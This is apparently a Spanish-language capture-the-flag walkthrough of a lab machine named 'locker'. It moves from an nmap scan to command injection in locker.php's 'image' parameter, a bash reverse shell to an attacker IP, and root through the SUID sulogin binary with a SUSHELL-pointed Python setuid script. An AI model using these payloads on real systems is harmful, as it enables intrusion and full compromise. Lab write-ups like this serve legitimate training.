Enumeramos puertos:
❯ sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.140
❯ nmap -sCV -p80 -oN 02-targeted.txt 192.168.1.140
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-27 15:24 -04
Nmap scan report for 192.168.1.140
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.42 secondsEl sitio carga imágenes mediante un parámetro, vulnerable a inyección de comandos:
http://192.168.1.140/locker.php?image=1❯ curl 'http://192.168.1.140/locker.php?image=;id;'
<img src="data:image/jpg;base64,uid=33(www-data) gid=33(www-data) groups=33(www-data)
"width="150"height="150"/>Lanzamos una reverse shell (URL-encoded):
❯ curl 'http://192.168.1.140/locker.php?image=;bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.1.3/1234%200%3E%261%22;'
❯ ncat -nlvp 1234
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.140:33684.
bash: cannot set terminal process group (369): Inappropriate ioctl for device
bash: no job control in this shell
www-data@locker:~/html$Para escalar, buscamos binarios SUID y encontramos sulogin:
www-data@locker:~$ find / -perm -4000 2>/dev/null
...
/usr/sbin/sulogin
...sulogin ejecuta el shell indicado por la variable de entorno SUSHELL. Creamos un script en Python que invoca setuid(0) y lanza bash:
❯ cat pwned.py
#!/usr/bin/python3
import os
def main():
os.setuid(0)
os.setgid(0)
os.system("/bin/bash")
if __name__ == "__main__":
main()Lo transferimos, apuntamos SUSHELL a él y ejecutamos sulogin:
www-data@locker:/tmp$ wget http://192.168.1.3:8000/pwned.py
www-data@locker:/tmp$ chmod +x pwned.py
www-data@locker:/tmp$ export SUSHELL=/tmp/pwned.py
www-data@locker:/tmp$ sulogin -e
sulogin -e
Press Enter for maintenance
(or press Control-D to continue):
root@locker:~#Obtenemos nuestra flag.
Fin.